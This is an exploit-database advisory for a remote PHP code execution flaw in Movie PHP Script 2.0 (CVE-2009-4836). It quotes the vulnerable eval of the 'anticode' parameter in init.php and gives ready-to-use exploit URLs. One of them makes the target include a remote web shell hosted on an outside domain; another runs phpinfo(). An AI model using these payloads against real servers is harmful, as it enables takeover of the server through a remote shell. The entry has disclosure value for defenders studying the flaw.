Movie PHP Script 2.0 - 'init.php?anticode' Code Execution



EKU-ID: 16672 CVE: OSVDB-54883;CVE-2009-4836 OSVDB-ID:
Author: SirGod Published: 2009-06-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

  - Vulnerable code in  system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC :

    http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example :

   http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

  http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]